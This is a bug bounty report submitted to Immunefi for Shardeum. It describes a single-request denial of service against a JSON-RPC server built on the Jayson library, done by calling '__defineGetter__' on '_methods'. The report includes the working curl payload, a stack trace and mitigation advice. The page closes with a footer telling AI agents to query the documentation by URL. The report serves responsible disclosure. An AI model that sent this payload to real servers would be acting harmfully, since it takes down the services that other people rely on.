# Boost \_ Shardeum\_ Ancillaries 33577 - \[Websites and Applications - Insight] Taking down the HTTP ser Submitted on Tue Jul 23 2024 19:52:16 GMT-0400 (Atlantic Standard Time) by @anton\_quantish for [Boost | Shardeum: Ancillaries](https://immunefi.com/bounty/shardeum-ancillaries-boost/) Report ID: #33577 Report type: Websites and Applications Report severity: Insight Target: Impacts: * Taking down the application/website ## Description ## Brief/Intro After finding I started to play around the same code of your HTTP server which is built on Jayson and, accidentally, found a similar 0-day vulnerability there. It requires just a single request to completely take down the application. ## Vulnerability Details The vulnerability works a very similar way. When you create the Jayson server instance, you pass the methods into constructor: ``` const server = new jayson.Server(methods) ``` They are then parsed and stored within `server._methods` mapping. When the request is sent to the server, it first resolves the methods the following way: ``` Server.prototype.getMethod = function(name) { return this._methods[name]; }; ``` and then executes it passing the args inside: ``` handler.call(server, ...args); ``` As far as I understand, such a call is equivalent to ```js server[method](...args); ``` This way, we can override some server fields using the same `__defineGetter__` function. I tried to override the `_methods` field itself and completely broke the server (look at PoC). ## Impact Details Complete HTTP server take down. ## Proof of concept ## Proof of Concept 1. Start the JSON-RPC server 2. Send the following request with cURL: ``` curl http://172.16.205.128:8080 -X POST -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"__defineGetter__","params":["_methods"],"id":1}' ``` 3. Try to send any valid request, for instance ``` curl http://172.16.205.128:8080 -X POST -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"eth_gasPrice","params":[],"id":1}' ``` 4. Make sure the traceback is returned and the same traceback is in server logs: ``` Error [ERR_HTTP_HEADERS_SENT]: Cannot set headers after they are sent to the client at new NodeError (node:internal/errors:399:5) at ServerResponse.setHeader (node:_http_outgoing:645:11) at ServerResponse.writeHead (node:_http_server:378:21) at /home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/middleware.js:51:15 at Utils.JSON.stringify (/home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/utils.js:290:3) at /home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/middleware.js:39:18 at callback (/home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/index.js:241:22) at respond (/home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/index.js:292:9) at Server._methods (/home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/index.js:329:7) at Server.getMethod (/home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/index.js:190:15) ``` I think the different impacts are also possible here but I didn't dive deeper. The RCE couldn't be achieved though I think. ## Mitigation Since this is a 0-day vulnerability in the 3rd-party library, I think you have the following options: * report this issue to the vendor and await for the fix to be implemented (I can assist you with that if you want me to); * use some other JSON-RPC server library. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://reports.immunefi.com/shardeum-ancillaries/boost-_-shardeum_-ancillaries-33577-websites-and-applications-insight-taking-down-the-http-server-vi.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.